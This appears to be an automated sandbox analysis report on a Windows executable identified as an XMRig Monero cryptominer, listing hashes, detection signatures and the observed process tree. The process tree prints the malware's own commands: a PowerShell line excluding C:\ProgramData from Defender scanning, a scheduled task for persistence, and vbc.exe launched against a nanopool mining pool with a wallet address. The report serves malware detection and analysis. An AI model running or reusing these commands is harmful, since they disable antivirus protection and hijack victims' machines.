Analysis
-
max time kernel
140s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2022 20:08
Static task
static1
Behavioral task
behavioral1
Sample
19a474356662325b2059630216338194.exe
Resource
win7-20220812-en
General
-
Target
19a474356662325b2059630216338194.exe
-
Size
1.1MB
-
MD5
19a474356662325b2059630216338194
-
SHA1
5537672751a37401bccf455f651d564bb314a924
-
SHA256
8b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
-
SHA512
d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
SSDEEP
24576:8tPBwXgZiujGrs4EroJ7WtRDbQMPLqxpw3qt:CigZMsMN4v9jqxpwa
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/4736-187-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4736-188-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/4736-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4736-190-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4736-192-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/4736-194-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
AVPTQBAEW.exepid process 4388 AVPTQBAEW.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
AVPTQBAEW.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation AVPTQBAEW.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
AVPTQBAEW.exedescription pid process target process PID 4388 set thread context of 4736 4388 AVPTQBAEW.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4060 timeout.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exeAVPTQBAEW.exepid process 2264 powershell.exe 2264 powershell.exe 4444 powershell.exe 4444 powershell.exe 4388 AVPTQBAEW.exe 4388 AVPTQBAEW.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 672 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
19a474356662325b2059630216338194.exepowershell.exeAVPTQBAEW.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 4972 19a474356662325b2059630216338194.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeDebugPrivilege 4388 AVPTQBAEW.exe Token: SeDebugPrivilege 4444 powershell.exe Token: SeLockMemoryPrivilege 4736 vbc.exe Token: SeLockMemoryPrivilege 4736 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 4736 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
19a474356662325b2059630216338194.execmd.exeAVPTQBAEW.execmd.exedescription pid process target process PID 4972 wrote to memory of 2264 4972 19a474356662325b2059630216338194.exe powershell.exe PID 4972 wrote to memory of 2264 4972 19a474356662325b2059630216338194.exe powershell.exe PID 4972 wrote to memory of 1840 4972 19a474356662325b2059630216338194.exe cmd.exe PID 4972 wrote to memory of 1840 4972 19a474356662325b2059630216338194.exe cmd.exe PID 1840 wrote to memory of 4060 1840 cmd.exe timeout.exe PID 1840 wrote to memory of 4060 1840 cmd.exe timeout.exe PID 1840 wrote to memory of 4388 1840 cmd.exe AVPTQBAEW.exe PID 1840 wrote to memory of 4388 1840 cmd.exe AVPTQBAEW.exe PID 4388 wrote to memory of 4444 4388 AVPTQBAEW.exe powershell.exe PID 4388 wrote to memory of 4444 4388 AVPTQBAEW.exe powershell.exe PID 4388 wrote to memory of 3800 4388 AVPTQBAEW.exe cmd.exe PID 4388 wrote to memory of 3800 4388 AVPTQBAEW.exe cmd.exe PID 3800 wrote to memory of 3504 3800 cmd.exe schtasks.exe PID 3800 wrote to memory of 3504 3800 cmd.exe schtasks.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe PID 4388 wrote to memory of 4736 4388 AVPTQBAEW.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe"C:\Users\Admin\AppData\Local\Temp\19a474356662325b2059630216338194.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD9F9.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:4060 -
C:\ProgramData\WindowsMail\AVPTQBAEW.exe"C:\ProgramData\WindowsMail\AVPTQBAEW.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AVPTQBAEW" /tr "C:\ProgramData\WindowsMail\AVPTQBAEW.exe"5⤵
- Creates scheduled task(s)
PID:3504 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4736
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
1.1MB
MD519a474356662325b2059630216338194
SHA15537672751a37401bccf455f651d564bb314a924
SHA2568b8221cc10a597ef1872eed5525b3ec02d645652b60b8243110ab9a5d8589d61
SHA512d355ec56e5cc367617acc4524b9d44dc242e8f0fcc4fe28c9193c4c2dc3fa132368839a22a4ec470b0e506cefaadf69a3291c8e9dc766cdfb90541b7a5e0ecd4
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
149B
MD5bfacba53b6862fce9f3109ea0c35cb6e
SHA17b0f4b503b4f118d4785b96ffa9a724780909997
SHA2569d1f92cd52d708e9670d94297a9a19c61a7d5239072ab832fa64c3cd7a8abc46
SHA512e7935b64f3dffab50cffc3987f8275f682a5728be29fb333feb48b8ffb38270c316fa4687ae76eb55e5c2f5a175b6312b14488afad8622acd89fc2543ad89420